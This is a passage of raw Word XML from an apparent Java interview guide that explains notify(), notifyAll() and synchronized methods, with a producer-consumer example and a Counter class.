        <w:t xml:space="preserve"> thread that is currently in the waiting state for the same object. If multiple threads are waiting on the object, one of them will be chosen randomly by the JVM to be notified. The thread that is notified will acquire the lock again and resume execution from the point where it left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E625C06" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>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Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> After calling notify(), the thread must release the lock on the object before another thread can acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E713456"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1B623"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synchronized (sharedObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE52FF6"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sharedObject.notify(); // Notify one waiting thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DC2A3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0D1FE" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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3. notifyAll() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014AA87" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>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The notifyAll() method wakes up </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> threads that are currently waiting on the object. Once notified, these threads will compete for the lock again and resume execution based on the availability of the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEF227" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>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notifyAll() is useful when you want all waiting threads to wake up and check if they can proceed, especially when the condition they are waiting for has changed and it may be different for each thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFCBEC5"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F8E64"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synchronized (sharedObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347671DD"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sharedObject.notifyAll(); // Notify all waiting threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFAF577"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7A954" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00000000" w:rsidP="004142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9BE76D0">
          <v:rect id="_x0000_i1858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717BFDB" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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Key Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527DAD9" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123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chronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Both notify() and notifyAll() must be called from within a synchronized block or method to ensure that the thread has acquired the lock on the object before it can notify other threads. If the notify() or notifyAll() methods are called outside of a synchronized context, it will throw an IllegalMonitorStateException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550389B4" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123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Thread Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The notify() or notifyAll() method does not guarantee which thread will be notified. When notify() is used, only one waiting thread will be notified, and the other waiting threads remain in the waiting state until they are notified again. When notifyAll() is used, all waiting threads will be awakened and they will compete for the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C69430" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123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lastRenderedPageBreak/>
        <w:t>Thread State</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After being notified, a thread does not immediately continue execution. It must reacquire the lock to proceed, which means it may have to wait for other threads to release the lock if they are still executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742FA816" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00000000" w:rsidP="004142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AE0E042">
          <v:rect id="_x0000_i1859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63504C1A" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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Example of notify() and wait():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8461E1"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Here's a simple producer-consumer example to demonstrate how notify() and wait() work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABC5CF"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class ProducerConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD08491"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rivate static final int MAX_CAPACITY = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A9DDF"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rivate int itemCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34073CC5" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B3135B"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Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA4FF8"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ublic synchronized void produce() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAA2A2"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hile (itemCount == MAX_CAPACITY) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DC38B"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ait(); // Wait if the buffer is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E638929"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3B91B652"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itemCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C4C1E"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System.out.println("Produced: " + itemCount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0FD0E"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notify(); // Notify the consumer that there's something to consume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3688D9FA"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3B1F2822" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355371CD"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Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4189F5"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ublic synchronized void consume() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36565698"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hile (itemCount == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944CFD9"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ait(); // Wait if the buffer is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE68E60"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5AF0CAD8"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itemCount--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2B5BB"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System.out.println("Consumed: " + itemCount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722AB0A"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notify(); // Notify the producer that there's space to produce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28086BE3"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661FA15B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DFB3F" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1C7BE7"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public class ProducerConsumerDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA027F"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE70BE"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roducerConsumer pc = new ProducerConsumer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8021E" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B060241"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Producer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50914AC8"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Thread producer = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EECC52"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142154B0"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for (int i = 0; i &lt; 15; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA90D1"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c.produce();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59529A8F"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Thread.sleep(500); // Simulate production time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51004AB9"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133F6ED4"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B89C5"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30FA60"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4101E401"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0094DDDF" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A106FE1"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Consumer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0E99A"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Thread consumer = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E763D"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547ACBF7"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for (int i = 0; i &lt; 15; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF995A"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c.consume();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAC445"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Thread.sleep(1000); // Simulate consumption time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA87C36"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7CB1E1BB"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DB307"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739E332"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDABDC"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574707B0" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFED303"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roducer.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1FF64"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consumer.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF8F58"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1D8B1217"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41BE37" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B3739" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>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e producer thread calls produce() and waits if the buffer is full (i.e., itemCount == MAX_CAPACITY), and the consumer thread calls consume() and waits if the buffer is empty (i.e., itemCount == 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F24745" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>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When the producer adds an item, it calls notify() to wake up the consumer. Similarly, when the consumer consumes an item, it calls notify() to wake up the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A4F96E" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>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If you used notifyAll() instead of notify(), all waiting threads (in this case, the producer and consumer) would be notified, but only one would proceed at a time, depending on who acquires the lock first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101E938" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F"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is demonstrates how notify() and wait() work in thread communication and synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E9CDD" w14:textId="77965561" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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2DD1C61">
          <v:rect id="_x0000_i1860" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE2CAA" w14:textId="77777777" w:rsidR="001418BD" w:rsidRPr="00CE4B95" w:rsidRDefault="001418BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="_Toc196307769"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is synchronized in multithreading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w14:paraId="07517F4D" w14:textId="23A2C7E6" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In multithreading, </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mechanism that ensures that only one thread can access a shared resource or critical section of code at a time. It helps prevent thread interference and ensures data consistency when multiple threads are accessing shared data or performing operations that need to be executed in a specific order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D5F49"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Without synchronization, multiple threads can access shared data concurrently, leading to race conditions, where the outcome depends on the order of execution. This can cause unpredictable behavior and bugs that are difficult to reproduce or debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D5F74" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Purpose of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893C4E6" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mutual Exclusion (Mutex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that only one thread can access a particular section of code or data at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F58AA4" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Protects shared resources (like variables or objects) from being modified concurrently by multiple threads, thus maintaining the integrity and consistency of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D47C4F" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preventing Race Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Race conditions occur when multiple threads attempt to modify the shared resource simultaneously, leading to unpredictable results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1CE84" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ways to Implement Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CACD7"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Java provides multiple ways to achieve synchronization in multithreading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F9CEF" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Synchronized Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138434B9"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A method can be marked as synchronized to ensure that only one thread at a time can execute it on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E76403"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4B9E2"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BD112" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE05B55"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 Synchronized method to ensure thread safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CA3C6"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC398E1"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CCC130"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C12EB" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680EC252"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941B4DC"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C41313"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C6763"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7369B" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the example above, the increment() method is synchronized. If one thread is executing this method on an instance of Counter, no other thread can execute any other synchronized method on the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B69287" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
